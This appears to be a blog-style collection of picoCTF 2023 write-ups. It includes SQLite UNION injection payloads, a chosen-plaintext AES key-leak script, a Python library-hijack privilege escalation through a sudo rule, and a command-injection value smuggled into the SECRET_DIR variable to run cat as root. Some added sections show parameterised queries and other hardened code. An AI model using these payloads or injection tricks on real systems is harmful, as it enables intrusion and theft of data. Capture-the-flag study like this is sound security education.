Payload:' UNION SELECT (SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' LIMIT 3,1),2,3--
Stepping the LIMIT offset back and forth turns up a table called more_table; attack once more to see which columns it contains:
Payload:' UNION SELECT (SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='more_table'),2,3--
It holds a column called flag; SELECT it to obtain the flag.
Payload:' UNION SELECT (SELECT flag FROM more_table),2,3--
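As an added example (not part of the writeup), the three payloads above are run against a constructed in-memory SQLite database, once through a query built by string concatenation and once through a parameterised one. The books table, its three columns and the sample flag are assumptions; four tables are created so that the page's LIMIT 3,1 offset lands on more_table.

```python
# Added example (not from the writeup): the writeup's sqlite_master payloads
# against a constructed database, through a vulnerable and a hardened query.
import sqlite3


def build_db():
    """Constructed schema: four tables so that LIMIT 3,1 selects more_table."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE books (title TEXT, author TEXT, year INTEGER)")
    cur.execute("CREATE TABLE users (name TEXT, pw TEXT, role TEXT)")
    cur.execute("CREATE TABLE sessions (id TEXT, user TEXT, expires INTEGER)")
    cur.execute("CREATE TABLE more_table (flag TEXT)")
    cur.execute("INSERT INTO books VALUES ('Dune', 'Herbert', 1965)")
    cur.execute("INSERT INTO more_table VALUES ('picoCTF{constructed_sample_flag}')")
    conn.commit()
    return conn


def search_vulnerable(conn, title):
    """User text is spliced into the SQL: the quote closes the literal, UNION
    appends a row of the attacker's choosing and -- discards the trailing quote."""
    return conn.execute(
        f"SELECT title, author, year FROM books WHERE title = '{title}'"
    ).fetchall()


def search_safe(conn, title):
    """The placeholder binds the text as a value; it can never become SQL syntax."""
    return conn.execute(
        "SELECT title, author, year FROM books WHERE title = ?", (title,)
    ).fetchall()


# The three payloads quoted in the writeup, unchanged
PAYLOADS = {
    "tables": "' UNION SELECT (SELECT tbl_name FROM sqlite_master WHERE type='table' "
              "and tbl_name NOT like 'sqlite_%' LIMIT 3,1),2,3--",
    "schema": "' UNION SELECT (SELECT sql FROM sqlite_master WHERE type!='meta' "
              "AND sql NOT NULL AND name ='more_table'),2,3--",
    "flag": "' UNION SELECT (SELECT flag FROM more_table),2,3--",
}


def demo():
    """Run every payload through both query styles; return the rows each yields."""
    conn = build_db()
    out = {"vulnerable": {}, "safe": {}}
    for label, payload in PAYLOADS.items():
        out["vulnerable"][label] = search_vulnerable(conn, payload)
        out["safe"][label] = search_safe(conn, payload)
    out["normal"] = search_safe(conn, "Dune")   # the parameterised query still works
    return out


if __name__ == "__main__":
    for style, rows in demo().items():
        print(style, rows)
```

Call demo() to compare: the string-built query returns the attacker-chosen row for each payload (table name, then the CREATE statement, then the flag), while the bound-parameter version returns nothing because the payload is compared as a literal title. The fix is the placeholder, not quote escaping; sqlite_master is readable by any query, so once injection exists, schema discovery cannot be blocked at the SQL level.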
Java Code Analysis!?!
AUTHOR: NANDAN DESAI
Description BookShelf Pico, my premium online book-reading service. I believe that my website is super secure. I challenge you to prove me wrong by reading the ‘Flag’ book! Here are the credentials to get you started: Username: “user” Password: “user” Source code can be downloaded here. Website can be accessed here!. 300 Points
private String generateRandomString(int len) {
    // not so random
    return "1234";
}

String getServerSecret() {
    try {
        String secret = new String(FileOperation.readFile(userDataPaths.getCurrentJarPath(), SERVER_SECRET_FILENAME), Charset.defaultCharset());
        logger.info("Server secret successfully read from the filesystem. Using the same for this runtime.");
        return secret;
    } catch (IOException e) {
        logger.info(SERVER_SECRET_FILENAME + " file doesn't exists or something went wrong in reading that file. Generating a new secret for the server.");
        String newSecret = generateRandomString(32);
        try {
            FileOperation.writeFile(userDataPaths.getCurrentJarPath(), SERVER_SECRET_FILENAME, newSecret.getBytes());
        } catch (IOException ex) {
            ex.printStackTrace();
        }
        logger.info("Newly generated secret is now written to the filesystem for persistence.");
        return newSecret;
    }
}
Description This encryption algorithm leaks a “bit” of data every time it does a computation. Use this to figure out the encryption key. Download the encryption program here encrypt.py. Access the running server with nc saturn.picoctf.net 53848. The flag will be of the format picoCTF{<encryption key>} where <encryption key> is 32 lowercase hex characters comprising the 16-byte encryption key being used by the program. 200 Points
# Leaks one bit of information every operation
leak_buf = []
def leaky_aes_secret(data_byte, key_byte):
    out = Sbox[data_byte ^ key_byte]
    leak_buf.append(out & 0x01)
    return out

# Simplified version of AES with only a single encryption stage
def encrypt(plaintext, key):
    global leak_buf
    leak_buf = []
    ciphertext = [leaky_aes_secret(plaintext[i], key[i]) for i in range(16)]
    return ciphertext

# Leak the number of 1 bits in the lowest bit of every SBox output
def encrypt_and_leak(plaintext):
    ciphertext = encrypt(plaintext, SECRET_KEY)
    ciphertext = None  # throw away result
    time.sleep(0.01)
    return leak_buf.count(1)

pt = input("Please provide 16 bytes of plaintext encoded as hex: ")
if len(pt) != 32:
    print("Invalid length")
    sys.exit(0)
from pwn import remote

# sb is the AES S-box table copied from encrypt.py; out[i] is the pattern of
# low bits that key byte i would produce for plaintext bytes 0..14
out = []
for i in range(256):   # every possible key byte (stopping at 0xff would skip 255)
    m = []
    for j in range(15):
        m.append(sb[j ^ i] & 0x01)
    out.append(m)

for i in out:
    print(i)

flage = []
for i in range(16):
    n = []
    nn = []
    for j in range(15):
        # only byte (15 - i) of the plaintext varies; every other byte is zero
        payload = ''
        payload += '0' * ((15 - i) * 2 + 1)
        payload += hex(j)[2:]
        payload += '0' * i * 2
        r = remote('saturn.picoctf.net', 56284)
        r.recvuntil(': ')
        r.sendline(payload.encode())
        g = int(r.recvline().strip()[16:])
        n.append(g)
        r.close()
    for k in n:
        nn.append(k - min(n))   # remove the constant contribution of the 15 zero bytes
    print(nn)
    for l in range(256):
        if out[l] == nn:
            flage.append(l)

flage.reverse()   # byte (15 - i) was recovered in round i
print(flage)
print(''.join(['%02x' % i for i in flage]))   # zero-pad so the key is 32 hex chars
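To show why a handful of chosen plaintexts per byte is enough, here is an added offline model of the leak and of the recovery the script above performs; it is not the challenge's code and does not contact the server. The S-box is generated rather than pasted, the key is a constructed sample, and the byte search is adaptive: it keeps adding trial values until a single candidate remains, which generalises the script's fixed fifteen trials.

```python
# Added example (not from the writeup): offline model of the one-bit S-box leak
# and of the chosen-plaintext key recovery the solve script runs against the server.


def aes_sbox():
    """Generate the AES S-box (avoids transcribing 256 constants)."""
    sbox = [0] * 256
    p = q = 1
    while True:
        # p = p * 3 in GF(2^8) with the AES polynomial 0x11B
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF
        # q = q / 3 (multiplication by 0xF6), so q stays the inverse of p
        q ^= (q << 1) & 0xFF
        q ^= (q << 2) & 0xFF
        q ^= (q << 4) & 0xFF
        if q & 0x80:
            q ^= 0x09
        rotl = lambda v, n: ((v << n) | (v >> (8 - n))) & 0xFF
        sbox[p] = q ^ rotl(q, 1) ^ rotl(q, 2) ^ rotl(q, 3) ^ rotl(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = aes_sbox()


def leak_count(plaintext, key):
    """What the challenge server returns: how many of the 16 S-box outputs have low bit 1."""
    return sum(SBOX[plaintext[i] ^ key[i]] & 1 for i in range(16))


def recover_key(oracle):
    """Recover all 16 key bytes from oracle(plaintext_bytes) -> leak count.

    Only one plaintext byte is varied at a time, so the count changes only through
    SBOX[v ^ key[pos]] & 1; the other 15 positions contribute a constant that the
    all-zero plaintext measures once."""
    base = oracle(bytes(16))
    key = bytearray(16)
    for pos in range(16):
        cands = list(range(256))
        v = 1
        while len(cands) > 1 and v < 256:   # add trial bytes until one candidate is left
            pt = bytearray(16)
            pt[pos] = v
            diff = oracle(bytes(pt)) - base
            cands = [k for k in cands if (SBOX[v ^ k] & 1) - (SBOX[k] & 1) == diff]
            v += 1
        if len(cands) != 1:
            raise RuntimeError(f"key byte {pos} ambiguous: {cands}")
        key[pos] = cands[0]
    return bytes(key)


def demo(key_hex="00112233445566778899aabbccddeeff"):
    """Constructed sample key; returns (recovered key as hex, number of oracle queries)."""
    key = bytes.fromhex(key_hex)
    queries = 0

    def oracle(pt):
        nonlocal queries
        queries += 1
        return leak_count(pt, key)

    return recover_key(oracle).hex(), queries


if __name__ == "__main__":
    print(demo())
```

The per-byte search compares differences against the all-zero query rather than against the minimum, which avoids the corner case where every trial value happens to produce a 1 bit. Each query costs one connection on the real server, so the adaptive loop usually stops after about ten trials per byte.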
Description Can you make a CoreWars warrior that always loses, no ties? Your opponent is the Imp. The source is available here. If you wanted to pit the Imp against himself, you could download the Imp and connect to the CoreWars server like this: nc saturn.picoctf.net 64827 < imp.red 100 Points
$ ./ret
Enter the password to unlock this file: picoCTF{3lf_r3v3r5ing_succe55ful_2f0131a
You entered: picoCTF{3lf_r3v3r5ing_succe55ful_2f0131a
Password correct, please see flag: picoCTF{3lf_r3v3r5ing_succe55ful_2f0131a4}
picoCTF{3lf_r3v3r5ing_succe55ful_2f0131a
Safe Opener 2
AUTHOR: MUBARAK MIKAIL
Description What can you do with this file? I forgot the key to my safe but this file is supposed to help me with retrieving the lost key. Can you help me unlock my safe? 100 Points
Description Can you crack this black box? We grabbed this design doc from enemy servers: Download. We know that the rotation of the red axle is input and the rotation of the blue axle is output. The following input gives the flag as output: Download. 100 Points
$ python3
Python 3.10.6 (main, Nov 14 2022, 16:10:14) [GCC 11.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from Crypto.Util.number import *
>>> inp=39722847074734820757600524178581224432297292490103996085769154356559546905
>>> long_to_bytes(inp*5)
b'picoCTF{g34r5_0f_m0r3_c133eae2}'
P.S. So few people solved this one probably because nobody knew what a .dae file actually is XD
No way out
AUTHOR: KRIS
Description Put this flag in standard picoCTF format before submitting. If the flag was h1_1m_7h3_f14g submit picoCTF{h1_1m_7h3_f14g} to the platform. Windows game, Mac game 200 Points
Description Can you make a CoreWars warrior that wins? Your opponent is the Imp. The source is available here. If you wanted to pit the Imp against himself, you could download the Imp and connect to the CoreWars server like this: nc saturn.picoctf.net 58681 < imp.red To get the flag, you must beat the Imp at least once out of the many rounds. 200 Points
$ nc saturn.picoctf.net 58681 < imp.red
;redcode
;name Imp Ex
;assert 1
ADD #4, 3
MOV 2, @2
JMP -2
DAT #0, #4
end
Submit your warrior: (enter 'end' when done)

Warrior1:
;redcode
;name Imp Ex
;assert 1
ADD #4, 3
MOV 2, @2
JMP -2
DAT #0, #4
end

Rounds: 100
Warrior 1 wins: 26
Warrior 2 wins: 0
Ties: 74
You did it!
picoCTF{1mp_1n_7h3_cr055h41r5_441be1fc}
Virtual Machine 1
AUTHOR: LT ‘SYREAL’ JONES
Description The enemy has upgraded their mechanical analog computer. Start an instance to begin. We grabbed this design doc from enemy servers: Download. We know that the rotation of the red axle is input and the rotation of the blue axle is output. Reverse engineer the mechanism and get past their checker program: nc saturn.picoctf.net 63883 300 Points
$ nc saturn.picoctf.net 63883
If the input to the machine is 4347, what is the output?
Answer> 40683573
40683573
That's correct!
picoCTF{m0r3_g34r5_3g4d_2efa1d52}
Ready Gladiator 2
AUTHOR: LT ‘SYREAL’ JONES
Description Can you make a CoreWars warrior that wins every single round? Your opponent is the Imp. The source is available here. If you wanted to pit the Imp against himself, you could download the Imp and connect to the CoreWars server like this: nc saturn.picoctf.net 53774 < imp.red To get the flag, you must beat the Imp all 100 rounds. 400 Points
Description Every file gets a flag. The SOC analyst saw one image being sent back and forth between two people. They decided to investigate and found out that there was more than what meets the eye here. 100 Points
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 512 x 504, 8-bit/color RGBA, non-interlaced
41            0x29            Zlib compressed data, compressed
39739         0x9B3B          Zip archive data, at least v1.0 to extract, name: secret/
39804         0x9B7C          Zip archive data, at least v2.0 to extract, compressed size: 2869, uncompressed size: 3024, name: secret/flag.png
42908         0xA79C          End of Zip archive, footer length: 22
Description Someone just sent you an email claiming to be Google’s co-founder Larry Page but you suspect a scam. Can you help us identify whose mail server the email actually originated from? Download the email file here. Flag: picoCTF{FirstnameLastname} 100 Points
# # ARIN WHOIS data and services are subject to the Terms of Use ...
person: Wilhelm Zwalina ...
FindAndOpen
AUTHOR: MUBARAK MIKAIL
Description Someone might have hidden the password in the trace file. Find the key to unlock this file. This tracefile might be good to analyze. 100 Points
Description This image passes LSB statistical analysis, but we can’t help but think there must be something to the visual artifacts present in this image… Download the image here 200 Points
Description How to automate tasks to run at intervals on linux servers? Additional details will be available after launching your challenge instance. 100 Points
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Thu Mar 30 05:11:26 2023 from 114.36.17.55
picoplayer@challenge:~$ cat /challenge/metadata.json
{"flag": "picoCTF{Sch3DUL7NG_T45K3_L1NUX_7754e199}", "username": "picoplayer", "password": "a-8nJGZCTa"}
money-ware
AUTHOR: JUNI19
Description Flag format: picoCTF{Malwarename} The first letter of the malware name should be capitalized and the rest lowercase. Your friend just got hacked and has been asked to pay some bitcoins to 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is going on and asks you for advice. Can you identify what malware he’s being a victim of? 100 Points
This one is simple OSINT: search the web for that odd-looking string and you will find the malware's name.
Permissions
AUTHOR: GEOFFREY NJOGU
Description Can you read files in the root file? Additional details will be available after launching your challenge instance. 100 Points
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Thu Mar 30 05:27:26 2023 from 114.36.17.55
picoplayer@challenge:~$ /bin/sh
$ cat /challenge/metadata.json
{"flag": "picoCTF{uS1ng_v1m_3dit0r_021d10ab}", "username": "picoplayer", "password": "dLAqMvm7xv"}
repetitions
AUTHOR: THEONESTE BYAGUTANGAZA
Description Can you make sense of this file? Download the file here. 100 Points
Description There’s an interesting script in the user’s home directory Additional details will be available after launching your challenge instance. 100 Points
useless useless, — This is a simple calculator script
SYNOPSIS useless, [add sub mul div] number1 number2
DESCRIPTION Use the useless, macro to make simple calulations like addition,subtraction, multiplication and division.
Examples ./useless add 1 2 This will add 1 and 2 and return 3
./useless mul 2 3 This will return 6 as a product of 2 and 3
./useless div 6 3 This will return 2 as a quotient of 6 and 3
./useless sub 6 5 This will return 1 as a remainder of substraction of 5 from 6
Authors This script was designed and developed by Cylab Africa
picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_5562}
Special
AUTHOR: LT ‘SYREAL’ JONES
Description Don’t power users get tired of making spelling mistakes in the shell? Not anymore! Enter Special, the Spell Checked Interface for Affecting Linux. Now, every word is properly spelled and capitalized… automatically and behind-the-scenes! Be the first to test Special in beta, and feel free to tell us all about how Special streamlines every development process that you face. When your co-workers see your amazing shell interface, just tell them: That’s Special (TM) Start your instance to see connection details. Additional details will be available after launching your challenge instance. 300 Points
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Thu Mar 30 07:54:44 2023 from 127.0.0.1
Special$ ls
Is
sh: 1: Is: not found
Special$ pwd
Pod
sh: 1: Pod: not found

Special$ /bin/sh
Why go back to an inferior shell?
Special$ /bin/bash
Why go back to an inferior shell?
Special$ /bin/zsh
Why go back to an inferior shell?
Description Reception of Special has been cool to say the least. That’s why we made an exclusive version of Special, called Secure Comprehensive Interface for Affecting Linux Empirically Rad, or just ‘Specialer’. With Specialer, we really tried to remove the distractions from using a shell. Yes, we took out spell checker because of everybody’s complaining. But we think you will be excited about our new, reduced feature set for keeping you focused on what needs it the most. Please start an instance to test your very own copy of Specialer. Additional details will be available after launching your challenge instance. 400 Points
$ ssh -p 55013 ctf-player@saturn.picoctf.net
ctf-player@saturn.picoctf.net's password:
Specialer$
!        bind      compopt   elif      fc        if        printf    shift     true      while
./       break     continue  else      fg        in        pushd     shopt     type      {
:        builtin   coproc    enable    fi        jobs      pwd       source    typeset   }
[        caller    declare   esac      for       kill      read      suspend   ulimit
[[       case      dirs      eval      function  let       readarray test      umask
]]       cd        disown    exec      getopts   local     readonly  then      unalias
alias    command   do        exit      hash      logout    return    time      unset
bash     compgen   done      export    help      mapfile   select    times     until
bg       complete  echo      false     history   popd      set       trap      wait
Description Get the flag and reach the exit. Welcome to BabyGame! Navigate around the map and see what you can find! The game is available to download here. There is no source available, so you’ll have to figure your way around the map. You can connect with it using nc saturn.picoctf.net 61841. 100 Points
Description Can you solve this? What two positive numbers can make this possible: n1 > n1 + n2 OR n2 > n1 + n2 Enter them here nc saturn.picoctf.net 61849. Source 100 Points
$ nc saturn.picoctf.net 61849
n1 > n1 + n2 OR n2 > n1 + n2
What two positive numbers can make this possible:
2147483647
1
You entered 2147483647 and 1
You have an integer overflow
YOUR FLAG IS: picoCTF{Tw0_Sum_Integer_Bu773R_0v3rfl0w_fe14e9e9}
hijacking
AUTHOR: THEONESTE BYAGUTANGAZA
Description Getting root access can allow you to read the flag. Luckily there is a python file that you might like to play with. Through Social engineering, we’ve got the credentials to use on the server. SSH is running on the server. 200 Points
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Thu Mar 30 08:40:58 2023 from 114.36.17.55
picoctf@challenge:~$ ls -al
total 16
drwxr-xr-x 1 picoctf picoctf   20 Mar 30 08:40 .
drwxr-xr-x 1 root    root      21 Mar 16 02:08 ..
-rw-r--r-- 1 picoctf picoctf  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 picoctf picoctf 3771 Feb 25  2020 .bashrc
drwx------ 2 picoctf picoctf   34 Mar 30 08:40 .cache
-rw-r--r-- 1 picoctf picoctf  807 Feb 25  2020 .profile
-rw-r--r-- 1 root    root     375 Mar 16 01:30 .server.py
picoctf@challenge:~$ cat .server.py
import base64
import os
import socket
ip = 'picoctf.org'
response = os.system("ping -c 1 " + ip) #saving ping details to a variable
host_info = socket.gethostbyaddr(ip) #getting IP from a domaine
host_info_to_str = str(host_info[2])
host_info = base64.b64encode(host_info_to_str.encode('ascii'))
print("Hello, this is a part of information gathering",'Host: ', host_info)
$ sudo -l
Matching Defaults entries for picoctf on challenge:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User picoctf may run the following commands on challenge:
    (ALL) /usr/bin/vi
    (root) NOPASSWD: /usr/bin/python3 /home/picoctf/.server.py
picoctf@challenge:~$ sudo -u root /usr/bin/python3 /home/picoctf/.server.py
# ls
__pycache__  base64.py
# cat /challenge/metadata.json
{"flag": "picoCTF{pYth0nn_libraryH!j@CK!n9_6924176e}", "username": "picoctf", "password": "rZSsB--vJK"}
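The sudo rule above runs an interpreter on a script that lives in the user's own home directory, and Python puts a script's directory at the front of sys.path, so any file there named like an imported module is loaded instead of the standard library. The following added check (not from the writeup) parses a script's imports and reports which of them a file in the script directory would shadow. The script text is the one printed above; the temporary directory and the planted file are constructed for the demonstration.

```python
# Added example (not from the writeup): audit check for stdlib modules that a
# script's own directory would shadow, the condition the sudo rule above relies on.
import ast
import os
import tempfile

# The import section of .server.py exactly as printed in the writeup
SERVER_PY = """import base64
import os
import socket
ip = 'picoctf.org'
"""


def imported_modules(source):
    """Top-level package names pulled in by absolute import statements."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names


def shadow_report(script_path):
    """List imports that a file or package in the script's directory would satisfy
    before the standard library, and whether this user could plant one there."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    with open(script_path) as f:
        modules = imported_modules(f.read())
    shadowed = []
    for name in sorted(modules):
        for candidate in (name + ".py", os.path.join(name, "__init__.py")):
            path = os.path.join(script_dir, candidate)
            if os.path.exists(path):
                shadowed.append((name, path))
    return {
        "script_dir": script_dir,
        "dir_writable_by_me": os.access(script_dir, os.W_OK),
        "shadowed": shadowed,
    }


def demo():
    """Constructed scenario: the script sits in a directory the user can write to.
    Returns the report before and after a same-named file appears beside it."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, ".server.py")
        with open(script, "w") as f:
            f.write(SERVER_PY)
        clean = shadow_report(script)
        # Simulated planted file (contains only a comment) named after a stdlib import
        with open(os.path.join(d, "base64.py"), "w") as f:
            f.write("# a file with this name is imported instead of the stdlib base64\n")
        planted = shadow_report(script)
        return clean, planted


if __name__ == "__main__":
    for report in demo():
        print(report)
```

In an audit this is the check to run on every script named in a sudoers entry: a shadowing hit, or simply a script directory the invoking user can write to, means the rule grants far more than the script itself. Mitigations are to move the script to a root-owned directory, or to run it with python3 -I, which leaves the script directory off sys.path; secure_path and env_reset do not help, because sys.path[0] is set by the interpreter rather than taken from the environment.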
tic-tac
AUTHOR: JUNIAS BONOU
Description Someone created a program to read text files; we think the program reads files with root privileges but apparently it only accepts to read files that are owned by the user running it. Additional details will be available after launching your challenge instance. 200 Points
std::string filename = argv[1];
std::ifstream file(filename);
struct stat statbuf;

// Check the file's status information.
if (stat(filename.c_str(), &statbuf) == -1) {
    std::cerr << "Error: Could not retrieve file information" << std::endl;
    return 1;
}

// Check the file's owner.
if (statbuf.st_uid != getuid()) {
    std::cerr << "Error: you don't own this file" << std::endl;
    return 1;
}

// Read the contents of the file.
if (file.is_open()) {
    std::string line;
    while (getline(file, line)) {
        std::cout << line << std::endl;
    }
} else {
    std::cerr << "Error: Could not open file" << std::endl;
    return 1;
}

return 0;
}

ctf-player@pico-chall$ ./txtreader flag.txt
Error: you don't own this file
This system has been minimized by removing packages and content that are not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Thu Mar 30 09:56:09 2023 from 127.0.0.1
ctf-player@pico-chall$ ls -al
total 28
drwxr-xr-x 1 ctf-player ctf-player    41 Mar 30 09:56 .
drwxr-xr-x 1 root       root          24 Mar 16 01:59 ..
-rw------- 1 ctf-player ctf-player    21 Mar 30 09:56 .bash_history
drwx------ 2 ctf-player ctf-player    34 Mar 30 09:56 .cache
-rw-r--r-- 1 root       root          67 Mar 16 01:59 .profile
-rwsr-xr-x 1 root       root       18752 Mar 16 01:59 bin
ctf-player@pico-chall$ ./bin
Error: SECRET_DIR environment variable is not set
Running it complains that SECRET_DIR is not set, so it apparently expects a directory path; let's try setting one right away.
ctf-player@pico-chall$ export SECRET_DIR=/
ctf-player@pico-chall$ ./bin
Listing the content of / as root:
bin   challenge  etc   lib    lib64   media  opt   root  sbin  sys  usr
boot  dev        home  lib32  libx32  mnt    proc  run   srv   tmp  var

ctf-player@pico-chall$ export SECRET_DIR="/;cat /challenge/metadata.json"
ctf-player@pico-chall$ ./bin
Listing the content of /;cat /challenge/metadata.json as root:
bin   challenge  etc   lib    lib64   media  opt   root  sbin  sys  usr
boot  dev        home  lib32  libx32  mnt    proc  run   srv   tmp  var
{"flag": "picoCTF{Power_t0_man!pul4t3_3nv_1670f174}", "password": "3f39b042"}
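The txtreader source above opens the file by name and then checks the owner with stat() on that name, so the open stream and the checked path can refer to different files if the name is re-pointed between the two calls; the ./bin helper, in turn, pastes SECRET_DIR into a shell command line, which is why a semicolon in the value runs a second command as root. As an added example (not from the challenge), here are hardened forms of both in Python: the reader checks ownership with fstat() on the descriptor it actually reads from and refuses symlinks, and the lister treats the environment value as a path only. The fixtures live in a constructed temporary directory.

```python
# Added example (not from the writeup): hardened versions of the two tic-tac
# defects, exercised against constructed fixtures in a temporary directory.
import os
import stat
import tempfile


def read_owned_file(path):
    """Hardened txtreader: open first, then fstat the very descriptor we read
    from, so nothing can be swapped between the check and the read."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
        if st.st_uid != os.getuid():
            raise PermissionError("you don't own this file")
    except BaseException:
        os.close(fd)
        raise
    with os.fdopen(fd, "r") as f:
        return f.read()


def list_dir_safe(secret_dir):
    """Hardened ./bin: SECRET_DIR is used as a path, never as shell text. A value
    such as "/;cat /challenge/metadata.json" is simply a directory that does not exist."""
    if not os.path.isabs(secret_dir):
        raise ValueError("SECRET_DIR must be an absolute path")
    return sorted(os.listdir(secret_dir))


def demo():
    """Run both helpers over constructed fixtures and collect what each did."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        mine = os.path.join(d, "mine.txt")
        with open(mine, "w") as f:
            f.write("hello\n")
        results["own_file"] = read_owned_file(mine)

        link = os.path.join(d, "link.txt")
        os.symlink(mine, link)
        try:
            read_owned_file(link)            # O_NOFOLLOW refuses the symlink
            results["symlink"] = "opened"
        except OSError as e:
            results["symlink"] = type(e).__name__

        try:
            read_owned_file(d)               # a directory is not a regular file
            results["directory"] = "opened"
        except PermissionError as e:
            results["directory"] = str(e)

        results["listing"] = list_dir_safe(d)
        try:
            list_dir_safe(d + ";cat /challenge/metadata.json")   # the page's injection string
            results["injection"] = "listed"
        except FileNotFoundError:
            results["injection"] = "FileNotFoundError"
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Checking ownership on the descriptor removes the race entirely rather than narrowing it, and O_NOFOLLOW closes the symlink route as a separate layer. For the listing, os.listdir needs no subprocess at all; if a helper really must be spawned, pass it an argument list rather than a string built from the environment, so the value cannot introduce shell syntax.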